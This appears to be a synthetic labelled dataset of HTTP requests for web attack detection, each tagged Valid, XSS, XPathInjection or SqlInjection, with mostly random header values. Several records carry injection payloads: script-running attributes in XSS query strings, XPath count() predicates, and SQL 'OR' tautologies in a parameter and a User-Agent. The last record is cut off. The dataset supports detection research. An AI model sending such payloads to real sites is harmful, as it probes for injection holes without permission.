GET /enetqbdTSuA/nse4demtdime2Otbl/Ta9Lhttps6MChttpZV5/1--WeO56hD4L4/_access_logmOOn0R.3RkC-u/hqsy32g3OOt/n96ki1VAuPe/sc.css?insertzEtpqjs=ncbmBg+sstdinnpscript&rwItrcn=73&4tEZnph-M=l&wiutuaaauri=log%3Deedr%25aisndt3tUm&rEeye8bp8r6dve=8367362&euxz=94441880 HTTP/1.0
Host: 151.31.123.233
Connection: enaea
Accept: */*;q=0.0
Accept-Charset: koi8;q=0.4, iso-8859-1;q=0.1
Accept-Encoding: gzip;q=0.4, identity;q=0.6, gzip, deflate
Accept-Language: *;q=0.8
Cache-Control: max-age=704
Client-ip: 176.169.150.86
Cookie: nzrpZbA=sm ;oetzti=5nR2s;HdropTjgr3Tnph-E1A=aydtni5iopt0e;rw=gEMw5llkkvdD;DdSL2ncPM=ol.0N8gA
Cookie2: $Version="664"
Date: Wed, 17 Aug 05 17:45:15 UTC
ETag: "GSLvwHYvvQlrtGMcD"
Expect: aoqjTuhe
From: hims9lO@pelsineh9.it
If-Modified-Since: Sat, 25 Dec 04 03:07:30 CET
If-Unmodified-Since: Thu, 25 Jun 09 23:31:38 UTC
If-Match: *
If-None-Match: *
If-Range: "erreimeXw7xnv9Y2g3RV"
Max-Forwards: 133
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: Basic aWZnZWFhOnc2bHJy
Range: 833047-0828
Referer: http://aeirdbn.be/onaE/5669f/Oiw3as/rSefuce.php
TE: gzip,trailers
Trailer: Host
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 3.9; Rf-xT; rv:8.1.7) Gecko/40197820
UA-CPU: 68000
UA-Disp: 1458,0432,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 323x7218
Via: ode0A/8.8 127.197.242.170
Transfer-Encoding: osfe8; ecdee=sidsh
Upgrade: hsdut/4.6, ewe/5.4, jtlto/3.8, mdc/7.0
Warning: 161 www.yspael.tiff:6088 "aiusaddtrh" "Sat, 10 Jun 06 17:32:05 UTC"
X-Forwarded-For: 188.182.199.121
X-Serial-Number: 206617484
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20645
Start - Id: 3759
class: Valid
GET /jln.asp?oisia=dRcbs HTTP/1.0
Host: 243.95.190.146:80
Connection: 6esln5i
Accept: */*;q=0.0
Accept-Charset: euc-kr;q=0.0, iso-8859-4;q=0.0, x-mac-arabic, cp-950;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: x0gu=p7iscUqh
Client-ip: 133.193.120.30
Cookie: W7f-vhtpassPg=8075910;K9is=94894915;ninal7iSr=0839;tsgtaurnsgmpl=hnspGfKieprtelz
Cookie2: $Version="742"
Date: Mon, 11 Aug 08 19:06:17 GMT
ETag: W/"G8STgf-fSVE.G9zO"
Expect: Hnltifte=gEgrN;rweba=dmmta
From: t3r8@0e5kkbee.de
If-Modified-Since: Fri, 03 Oct 08 10:25:21 GMT
If-Unmodified-Since: Sat, 22 Dec 07 10:58:52 CET
If-Match: "CY108Yq8ZxGjSK6oVp"
If-None-Match: *
If-Range: Sun, 04 Apr 04 01:47:46 UTC
Max-Forwards: 5
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: d7tg8 ePiym=ryti
Authorization: i3rhtg aoknT=cenOm
Range: 106-087945,9846-
Referer: /lwliqal.pdf
TE: chunked;q=0.3,trailers
Trailer: Pragma
User-Agent: dSUK7@WpL- http://www.Oehtng.com
UA-CPU: StrongARM
UA-Disp: 599,9039,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0475x7705
Via: HTTP/0.9 194.223.113.210, FTP/5.3 www.bHtnet.css
Transfer-Encoding: compress
Upgrade: nan/5.7, Onp/4.3
Warning: 204 www.TminD.js:402 "chea9eo" 
X-Forwarded-For: 2.28.238.117
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3759
Start - Id: 21268
class: Valid
GET /heino4hs/oyrHzJa9neh0aaSe6/cloii4/dQotO.aqhLLwr5ZeYc5/itiroesj/eQ.U@/itas/mpyutt4fckce/enee.mdb?enro0tau=a%40%3A+g&cwybeaii=teapassthrurmhecebMbgsoundnx&hrnnsL=48396&e0teaeSaoloiS=yw&hetct=95&md=1700&lV1Icdnpx18esnt=13940&aanOert=108&pwtwak=516973&uut2rrirsiut=iwtFfia1&et=63-&geeOnScIatCt=4845809871&ogGmkleqtLe=xeGRoYp7Tw&moonrj1i=svhY7FC7_&ACowseahtpeaf5e=u%24nmpaemai%3C%28%7Ci HTTP/1.1
Host: 82.65.180.137
Connection: ctiia
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 205.209.84.73
Cookie: heMenctwntieane=9tnog-ekm
Cookie2: $Version="448"
Date: Wed, 16 Nov 05 18:41:23 CET
ETag: "DN5_ek@I3p5Suk40Kv"
Expect: ueuamw=t7or
From: ze1Aac@ziIi7Oart.ch
If-Modified-Since: Fri, 02 Feb 07 05:58:32 CET
If-Unmodified-Since: Mon, 12 Apr 10 05:57:45 GMT
If-Match: *
If-None-Match: "U2JLLedqAQnUmfF"
If-Range: "MNefeDsrRzZd5Pmi"
Max-Forwards: 2
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest username="ounet"
Authorization: Basic czRpaGNwYW86c3kxdm1haA==
Range: 793-,8602-038713,9-
Referer: http://ltteaOi.cz/fsorelr/oaa8ibsj/ejfUintt.asp
TE: trailers
Trailer: Date
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 6.0; eu-Lh; rv:9.8.6) Gecko/73177561
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 714x7693
Via: FTP/7.6 www.FtAE.html:24429
Transfer-Encoding: oshi1n; rodew9ru=sacE01
Upgrade: pfBcec/8.2
Warning: 031 41.122.125.127:7076 "Eiaoenuons" 
X-Forwarded-For: 185.82.248.52
X-Serial-Number: 900444
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21268
Start - Id: 22098
class: Valid
GET /sa1o/neute6mpi9eo/enerOQJnkeyTi/mZ6mSfOscJDBrBR_i/iBOhpD6CTuG7o7w-L/JiIO-/utskdiQ/cJOjcatboot.ini4allsaccess_logPYtg/aatnlaMj/BzhttpI7/udCPZk/iOI0s4xq.jsp? HTTP/1.0
Host: www.mlae.cz
Connection: jLra
Accept: video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=497
Client-ip: 26.31.74.193
Cookie: vClnodeL= tetFi;._IU=);T3W1V=a0nihd4;miesiaus3rce=rj9h3QRqc
Cookie2: $Version="3"
Date: Tue, 14 Feb 06 03:28:30 GMT
ETag: W/"lYWZyNUWq8@aWk_jMrW"
Expect: o5oh
From: eidhdeG@fpho.st
If-Modified-Since: Mon, 29 Aug 05 08:07:11 GMT
If-Unmodified-Since: Thu, 13 Nov 08 07:00:56 CET
If-Match: *
If-None-Match: "uMRlJswxxMSuipFwu7Vw"
If-Range: "BHXBdJN0A49z@-W@sOqt"
Max-Forwards: 3
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM bmFzaHNlYXppYWhvVGlqZW9UYW5ud3NvbkVtZ3VhaXN0b2c2eW90dG5l
Authorization: Digest cnonce="hatFo"
Range: 96-,140-326001,-7
Referer: http://qbrl.cz/Oiyntt.rar
TE: trailers,chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: iene4e
UA-CPU: StrongARM
UA-Disp: 1342,370,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8724x0388
Via: FTP/3.5 191.11.233.201, 3.5 145.58.204.159, FTP/0.5 30.194.150.14:32964
Transfer-Encoding: deflate
Upgrade: ldxnm/3.4, oesrs/9.6, qomt/8.2, ccth/1.0, aho/4.5
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22098
Start - Id: 27701
class: Valid
GET /nyGRdiXlX2O7T9wD/tfs6ner2t4aunsyen/eH6WHWt70ye/iD2-xOpeC/ooiyi5BlhutmisrNuao/rsqg80eltnieszot/aitDiayay2Omvr2/ioeorcepe3e9m/nhr26oauo.aspx?etmieyehUn0=38271554&ZusrNm36=hometasnezhvseh&ida9nbnEdnhro=hd6BNbV. HTTP/1.1
Host: www.iiy5yae.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3;q=0.8, iso-2022-jp;q=0.2, cp-932;q=0.7, x-mac-turkish, x-mac-roman
Accept-Encoding: identity, deflate;q=0.0, deflate
Accept-Language: itdxgr-Rl, s-sDgik8in;q=0.2
Cache-Control: no-transform
Client-ip: 38.127.32.105
Cookie: gruhoc=4;ot3a7e0ejax=m4-cq9A;sthhsytst7o=5482916;phNia1rtl=ihwwp-npsall
Cookie2: $Version="78"
Date: Wed, 22 Mar 06 20:31:01 UTC
ETag: W/"cMbfyIOoWmPld34ez"
Expect: 100-continue
From: bTem2@peiaee.st
If-Modified-Since: Sun, 17 Oct 04 09:22:10 UTC
If-Unmodified-Since: Sat, 27 Mar 10 05:08:44 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 07 Aug 06 07:20:55 CET
Max-Forwards: 858
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: zimA yerirc=yhvpDgts
Range: 19057-557
Referer: http://www.oecir.it/i95U6n/elec/soiELio/ltTh.sh
TE: chunked,deflate;q=0.6,gzip;q=0.8
Trailer: TE
User-Agent: roRotkts (k8r55lM@; e7V8n5; d2LNRpg; 2rq3.x6)
UA-CPU: PowerPC
UA-Disp: 9899,7417,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 576x948
Via: FTP/6.0 www.mooyyno.js:84407
Transfer-Encoding: compress
Upgrade: t6l5a/3.3, Nc7xg/4.5
Warning: 308 www.tixKj.jpg "aaearsdrrhaedma" 
X-Forwarded-For: 241.242.54.210
X-Serial-Number: 9842192214995
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27701
Start - Id: 48068
class: XSS
GET /wo4Fkeiihtlcynurs/etaKyRef/Eflrnr/er/WL/0BVboJnZKXQ/sm/7erNwu9TaeeeicvorenD/3GLxO1I8c2pDlK.sh?etcIpaohWea1hj=5e8mooo17&EEbWrVHSGI@=%25vsQ0+p&hreclicnr=lieIre&oSLq=60673&iottj7ir=%3Cbody++onload++++%3D++%22+++++%5Balert+%28%27ler%27%29%3B%5D++%22%3E&tersa3ng=aTismlwzer&3wnWnC4nNowaydt=httpsxp_wh6+c%24nsahselectt2&koMnku0pzoils=Osirolikekdlu&tsdeho5ii=n%40ujf%26 HTTP/1.0
Host: 111.201.60.172:538
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 185.80.82.48
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Wed, 01 Apr 09 24:57:07 CET
ETag: "R5BYw6j-JCKxG5F_i"
Expect: fuezA
From: dhasadu@Aharrt.org
If-Modified-Since: Sat, 22 Mar 08 05:12:10 CET
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: *
If-None-Match: "uq73dQZJVl33VABgs"
If-Range: Fri, 11 May 07 13:37:16 CET
Max-Forwards: 29
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=Hoedi
Range: -1,041-88,-53
Referer: /ieba.tar.gz
Trailer: If-Unmodified-Since
User-Agent: wTicXVlS-9 http://www.7soE.gov
UA-CPU: x86
UA-Disp: 4437,742,16
UA-OS: Solaris
UA-Pixels: 6001x2247
Via: 0.4 www.i3wnlsdR.png
Transfer-Encoding: gzip
Upgrade: 0eadh/9.5, oyzasn/0.3, ulmsi7/4.4, bdhaod/9.0, riJn/7.4
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 69.186.228.89
~~~~~: ~~~~~~~~~~

null

End - Id: 48068
Start - Id: 48098
class: XSS
GET /rTKsaRi.hynL/dt9zCn7ttfEtigcs/.XMhTa/6IJYbPCPoF/0ye0t8/o2beCzhGjWMfPjM-/sam-0Ruuk0VtelnetkN7/tLIa1me7/oltr/NASIVCzm/iuonqollpn/rSod.gif?7R4jqs=347020&ijeW=%3Cinput++++type++%3D+++%22++++image+%22+++dynsrc++%3D+%22+++javascript%3A+++%5Balert++++%28%27rcndde%27%29%3B%5D+++++%22++%3E HTTP/1.1
Host: www.Goanas4rq.gov:24
Connection: close
Accept: video/quicktime;q=0.7
Accept-Charset: x-mac-arabic, shift_jis;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: r1t8e=cyd
Client-ip: 148.235.193.134
Cookie: Net5fcit6yE=wascPhshda;r0y4=tlR6ae4Uu;imtkuc8aiiwlo=iscey;Roh0wi9w= iE45c?L8ozenomct;ee1cenwewc=ts5iatOotbEi;vNmbeX=rheaels
Cookie2: $Version="657"
Date: Fri, 08 Oct 04 19:52:00 UTC
ETag: W/"lelin9pwJGbeCb4nxqO"
Expect: 100-continue
From: aIafz@wvamBrQ.uk
If-Modified-Since: Mon, 26 Nov 07 02:35:05 CET
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: Mon, 03 Mar 08 21:30:01 GMT
Max-Forwards: 4575
MIME-Version: 8.7
Pragma: dhiwoohl='hccrn'
Proxy-Authorization: ijdeiT kiao=mtjnUr
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: http://www.6itlnahE.uk/eeth5o.zip
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 2.5; an-en; rv:1.3.2) Gecko/31433875
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: HTTP/0.0 154.129.237.167:80326, 7.9 203.207.173.125, FTP/7.7 166.255.101.160
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48098
Start - Id: 8425
class: Valid
GET /0F/eM@bgsoundWs5updateh_tKEqY/osrn1k3amsc2to/husfsttgppiosoaaea/catqvp@deleteechojRP4@/4rnege.swf?ererOoep=sT-&sce=75028941&oddba85tubgbhpp=aro38urNb HTTP/1.0
Host: www.Ageasfqe.biz
Connection: keep-alive
Accept: audio/x-wav, image/jpeg
Accept-Charset: iso-8859-9, ks_c_5601-1987, x-mac-turkish;q=0.8, x-mac-cyrillic;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: ash-Ota;q=0.5
Cache-Control: no-transform
Client-ip: 146.158.92.239
Cookie: idnxzeoNa=oa;VevalF--whereD8q=as a9$n7n
Cookie2: $Version="8"
Date: Thu, 22 Sep 05 18:35:07 UTC
ETag: "BmjwZy0gzFIiyhOQcxY"
Expect: 100-continue
From: 8r0d@bdoa.cz
If-Modified-Since: Mon, 23 Nov 09 07:17:04 CET
If-Unmodified-Since: Thu, 27 Mar 08 19:47:06 GMT
If-Match: *
If-None-Match: "1A9Wn193xi0g4Gjn"
If-Range: *
Max-Forwards: 390
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM OHJlbWVlZXR3OWUyc3RmbWgydGRyb2djcmV3dFJ3cG9vZmlhcjZ0T2VlRW50bmE=
Authorization: Digest uri=http://manmtesr.de/3surs/enhdat.cfm
Range: 859-,4209-514,8-55532
Referer: http://mceei.st/be5ani/daypeY/EauuIi.jsp
TE: deflate,trailers
Trailer: If-Match
User-Agent: yohm/3.6.8
UA-CPU: MIPS
UA-Disp: 9749,6112,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3083x039
Via: 3.7 151.236.67.62, ind/0.4 17.50.208.191, ses8y/8.2 137.164.110.232
Transfer-Encoding: identity
Upgrade: hua/1.1
Warning: 357 99.135.65.27 "td6odiagrnr7lillcex" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8425
Start - Id: 33328
class: Valid
PUT /dK8Y-Sn/ta_wC3_93UAiwE.dll? HTTP/1.0
Content-Length: 48
Content-Language: m,abist,yhr
Content-Encoding: deflate
Content-Location: /inthso/pdet/ghfaHhei/i3eu1dan.mpeg
Content-MD5: Zm1lZHNyYXVkb3RLYWd5NA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Mar 06 02:19:25 GMT
Last-Modified: Wed, 25 Apr 07 11:54:54 CET
Host: www.nrR0olksa.ch:4553
Connection: modic
Accept: */*;q=0.1
Accept-Charset: koi8-r;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: 9ue-itWwa, r6gIidn-r5AeaiSs, Xo5oi-h, stag5-gcs;q=0.5, ab-pi
Cache-Control: only-if-cached
Client-ip: 216.161.7.224
Cookie: nenw=27;ee0=9HLf1358oK;rfo1otnma=6Ccxx3G-Tk;un8mnseoOAew=lo1
Cookie2: $Version="687"
Date: Sun, 17 May 09 12:24:49 UTC
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: hTuga
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Mon, 29 Nov 04 22:20:27 CET
If-Unmodified-Since: Sun, 23 May 04 16:49:44 CET
If-Match: *
If-None-Match: "1oduIFrhyl.FsNU9f"
If-Range: Mon, 31 Aug 09 04:59:32 CET
Max-Forwards: 9831
MIME-Version: 8.6
Pragma: iSi='stwi'
Proxy-Authorization: Digest response="82Aefeab6F6E793D521a04Cc9Ec2D0A4"
Authorization: Digest response="39bf4abAeec66BebfcDA83Bb0aC06c34"
Range: -608
Referer: /CabfsrsS/nteti/neoaolto/ahtne/tillac.php3
TE: gzip;q=0.9
Trailer: User-Agent
User-Agent: tehc5bIo
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1181x772
Via: iehn0/9.7 www.trnoob.jpeg, 7.9 50.82.126.213
Transfer-Encoding: identity
Upgrade: erraNN/6.8, erpl/9.7
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 6047064936
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

TeUjtlyon=eccjmA16&al=hpi&urtnEsni=Nnedsa8rn9alt

End - Id: 33328
Start - Id: 49057
class: XPathInjection
GET /oure4nergtniZl/4ezVcMwPW8/_JqVnwp-/aPYS-Z.aspx?tronantjy5Hqrat=tldra&oAS=ynr&lidteqhaeaas=ls&seiifhh6sQ=4096926343&ulehtoec3oe=%28i++%3C++count%28yg%2Fchild%3A%3Atext%28%29%29++and+++j+%3C++count%285einue%2Fchild%3A%3Acomment%28%29%29++++and+k+++++%3C+++count%28aa%2Fchild%3A%3A*%29+++++%29&enao=t-e5WmkP1&faost=30938&edieldItnyHg=2135230 HTTP/1.1
Host: www.eiSe2wte.net:72
Connection: er9febmu
Accept: video/quicktime, video/*, image/*;q=0.9
Accept-Charset: x-mac-roman;q=0.1, x-mac-arabic;q=0.7, gb2312;q=0.6, iso-8859-5;q=0.6, gb2312
Accept-Encoding: *;q=0.5
Accept-Language: rler-hOlnhcs2;q=0.4, bgtila-h, slt9-hre;q=0.2, psr4ro-cc
Cache-Control: max-stale
Client-ip: 20.81.251.104
Cookie: Uem=egtNhivrq:homeJ;oDdbeso=94;tteecZt=5012;Ss0asgesuC=nk
Cookie2: $Version="41"
Date: Sat, 27 Aug 05 14:03:01 UTC
ETag: W/"YX5bzwZtwNQk4-0no3z"
Expect: 8nnlas=imrht
From: thhe@eis9.be
If-Modified-Since: Mon, 22 Mar 04 20:16:08 GMT
If-Unmodified-Since: Thu, 24 Jun 04 09:01:07 GMT
If-Match: "VVXLeIO6GfdYYH@jIAKu"
If-None-Match: "uVnhMDttG13KSeiz"
If-Range: *
Max-Forwards: 323
MIME-Version: 6.2
Pragma: jeeifosh='ocTnSer0'
Proxy-Authorization: NTLM aHJ0aW5wc0Vpb3JnMW90aW1waHMzbXQzbXMza3FPdGFhc2lvaGRhZHY=
Authorization: Digest nonce
Range: 39-3,285934-049996,9533-33623
Referer: http://www.udunu.ch/ehoeih.jpg
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 6.7; ne-6n; rv:4.0.5) Gecko/17454234
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 003x367
Via: HTTP/5.8 www.srpoanr.css, FTP/9.7 174.224.157.210:69912, 5.6 www.ash3ta.html
Transfer-Encoding: s4nese
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49057
Start - Id: 24158
class: Valid
GET /sR@bgP8K1In24/ozcyTolkZxUC/lhkj4drHfqGsng/ednkZKQj1nEh/Te6tenvlnseroehtta/E.corQJ.jL5J/mjini/zec1ti/ii/Iewe3a/toenOeyseTt/rPHS0f.nsf?saen5m=ctmtsbgd%2B&goeeOihgaefd=616&na=e9LAn HTTP/1.0
Host: 147.101.126.15:80
Connection: keep-alive
Accept: audio/x-wav, image/*;q=0.7, application/zip;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=67336
Client-ip: 123.204.230.26
Cookie: TA9t4seSilNer=1260;IB@@iframe8JqjTV=250086;idunionJhWF8=2
Cookie2: $Version="45"
Date: Wed, 04 Aug 04 09:14:46 GMT
ETag: "s4tBYBnxgRfhumtRaIa"
Expect: 100-continue
From: neneodav@v5otnE.st
If-Modified-Since: Thu, 28 Sep 06 06:12:30 GMT
If-Unmodified-Since: Mon, 23 Aug 04 06:17:30 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.2
Pragma: tntsso=fe
Proxy-Authorization: eoczsc itSh=mlee
Authorization: sagzi arhoteu=ahqsel
Range: 392642-8535,09679-
Referer: /nedlIso/snmwm.jpg
TE: chunked;q=0.0
Trailer: Host
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 7.0; e3-al; rv:4.6.8) Gecko/16296517
UA-CPU: StrongARM
UA-Disp: 2537,365,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 978x997
Via: drrl/3.7 www.m4eu.js, 8.9 www.thsa.css, 0.1 244.39.117.117
Transfer-Encoding: fsl3y; eots=oo5d
Upgrade: bleion/1.0, dtdtte/9.5
Warning: 176 www.afsytan0.shtml:89321 "rtelrjklcea6e5" "Fri, 30 Oct 09 01:05:38 CET"
X-Forwarded-For: 91.102.253.43
X-Serial-Number: 14467935951
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24158
Start - Id: 41221
class: SqlInjection
GET /c_epD6GzB.cgi?Gmqfmssatln=oIne%3Fopeny-fo6dFee0%5B&enprnerCxt8=nN&tretqo7ldtSaS2=9489016&nTtyylaoceocsd=547&euadce0=dOFBe.xQPAX&sebzhnfarfu=ehr&5access_logiframeconnectgroup by3dgnetcata=934322393&ZwtziyU=ehSeo2K HTTP/1.1
Host: 239.65.223.235
Connection: ttrsey
Accept: text/*;q=0.1, audio/basic;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 73.137.44.90
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="065"
Date: Mon, 16 Apr 07 19:48:00 UTC
ETag: W/"5ZTrgczviWtaDg7uhH"
From: lcrspkh@Odiotms.cz
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: *
If-None-Match: "nF1dj1X9Hkza1EB7F-hH"
If-Range: Fri, 09 Nov 07 13:23:09 UTC
Max-Forwards: 1
Pragma: no-cache
Authorization: Digest nc=e8aa0EcD
Referer: /rlnb7ts/fa22mece/a7oyap/5psiicn.dll
TE: trailers,chunked,trailers
User-Agent:  OR    2    > 1
UA-CPU: 68000
UA-Color: color32
Via: HTTP/8.0 70.155.117.52
Transfer-Encoding: sswaa; inpdd=ean9c
Upgrade: t4nl/2.0, rRkw/3.5, nqe/4.4
X-Serial-Number: 042702
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41221
Start - Id: 9140
class: Valid
GET /nepUrotxtcq8nameR5/xDELHg/oJ4wV5mNrsXqWFp/8rkteEE/fw1m7ndtefhl/4whereLKPiYApositionQH-etc0/onuuf5IoyOrmanaLi/w1U.@qaqNmyzz/9Anoduyowerseeyytm/8.NJG5RzW_4PDHW/.IJ.jpeg?8aWT=5ilpassthru&sS3D1r=665&otsswa29n=96&oPhHTi4dHdP=eh+a&w11ftmRga2uc=95&6KAFKkM-es=4182611&VincludeWwp-6Z9bKB5=yTL9Hy1&scuc9cynt=93382 HTTP/1.1
Host: www.ihoxgrusa.ch
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: t-ens;q=0.6, sgictom-E;q=0.0, hhrni9g-a, rcei-eon;q=0.7
Cache-Control: min-fresh=73761
Client-ip: 157.17.102.184
Cookie: ihln9uizt1=xhdtooipQ
Cookie2: $Version="69"
Date: Mon, 02 Apr 07 06:45:35 GMT
ETag: W/"Olimrl8N8EDcthct"
Expect: 100-continue
From: ctaMmsso@ernuTGi.biz
If-Modified-Since: Fri, 09 Nov 07 24:28:16 CET
If-Unmodified-Since: Mon, 25 Aug 08 02:01:16 UTC
If-Match: "5yi.dcbBj9t906RAJSv"
If-None-Match: *
If-Range: "D6x9F1odqwz3vpJnSE8"
Max-Forwards: 9
MIME-Version: 9.1
Pragma: ld='ihiq0so4'
Proxy-Authorization: Digest qop=fe4a
Authorization: Digest username="1rmyafy"
Range: -8237
Referer: http://www.outmt52x.biz/aOilchri/mrarmmmt/neeTvrh/Tdtta/h8sx.avi
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.1 (compatible; MSIE 3.2; Windows NT; rlrya; RtrairzgDE; hbaheitlri)
UA-CPU: MIPS
UA-Disp: 419,947,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0794x264
Via: 1.8 163.155.96.124:60930, 7.3 www.sssgv.tiff:5, tSec/2.4 157.175.69.95
Transfer-Encoding: compress
Upgrade: mapEt/8.1, RNae/5.1
Warning: 310 109.122.74.194:1 "lwTr" 
X-Forwarded-For: 177.251.149.163
X-Serial-Number: 688483710117371
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 9140
Start - Id: 41767
class: SqlInjection
GET /sotHye5gruohoa/c5qB3BUpUIxYGOa8wL8h/zC6Hvf4kQKQ7.Dz0DciH.png?pisxPiKcgmd=2982339&t6elsitducerr=38013551&feiEo=OR+%27eianA%27++LIKE++++%27Sim%25%27&tuek=a5WleE6erewylaa&@HCopen=dsM22tf%28&terj=te7yeCrthiseOduin&Se=3odez3btsndh4nri HTTP/1.1
Host: www.ecm3et.de
Connection: ubbr
Accept: image/jpeg;q=0.0, text/plain;q=0.6
Accept-Charset: hz-gb-2312;q=0.2, x-mac-turkish;q=0.0, big5;q=0.4, windows-1253;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=26
Client-ip: 85.89.131.77
Cookie: rr=lrtputwnhr;is3aptprVe70eS=aetuhh;r9a72e=88157
Cookie2: $Version="0"
Date: Thu, 03 Apr 08 12:45:06 UTC
ETag: "Wc2Rnfj4sl@e6vV@QDMI"
Expect: osevnd
From: lngs3f@sl6ee5rs.it
If-Modified-Since: Thu, 06 Apr 06 12:29:25 CET
If-Unmodified-Since: Sun, 28 May 06 15:22:32 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Dec 09 21:04:19 CET
Max-Forwards: 9356
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM bnR0b1I2ZWVzdGlybmVJaG5lOG1lbm43YmV0dGFmbW4yZXdlTg==
Authorization: NTLM bmlpZWVncmx0cG53OWVhcWlzeXRzc294Y2x0cnR0dXMyRndhZWg=
Range: 4234-490888,-164882
Referer: http://ooeki5.de/gngsiegk/57soghiu/nasEe7ue/cwn5/sbeeo.exe
TE: gzip;q=0.2
Trailer: Upgrade
